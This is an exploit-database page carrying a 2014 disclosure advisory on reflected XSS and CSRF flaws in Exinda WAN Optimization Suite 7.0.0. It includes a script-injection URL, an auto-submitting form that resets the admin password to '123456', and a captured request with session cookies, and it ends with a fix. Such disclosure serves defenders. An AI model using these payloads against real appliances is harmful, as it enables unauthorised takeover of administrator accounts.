0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS Vulnerabilities

Author

William Costa

Risk

[

Security Risk Medium

]

0day-ID

0day-ID-22702

Category

web applications

Date add

28-09-2014

CVE

CVE-2014-7157
CVE-2014-7158

Platform

php

I. VULNERABILITY

-------------------------

XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite

II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:

III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&template=sys-users&tabsel=" parameter “tabsel” in
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-
users&tabsel=aaa"><script>alert("Exinda XSS")</script>

POC CSRF
  <html>

<body onload="CSRF.submit();">

<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/launch?script=rh&template=sys-
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>

<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>

<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>

</body>
</html>

 Host=demo-nam-02.exinda.com:34896
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,
deflate Referer=https://10.0.1.120/exinda/csrf.php
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-
exinda.com-1411601373982-94280;
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;
__utmb=217124611.6.9.1411601437592; __utmc=217124611;
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=300

POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin
g&c_account=string&e_account=true&f_account=admin&d_password=password&
c_password=-
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd

V. BUSINESS IMPACT -------------------------

Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.

VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)

VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS Vulnerabilities

Report Error

Report Error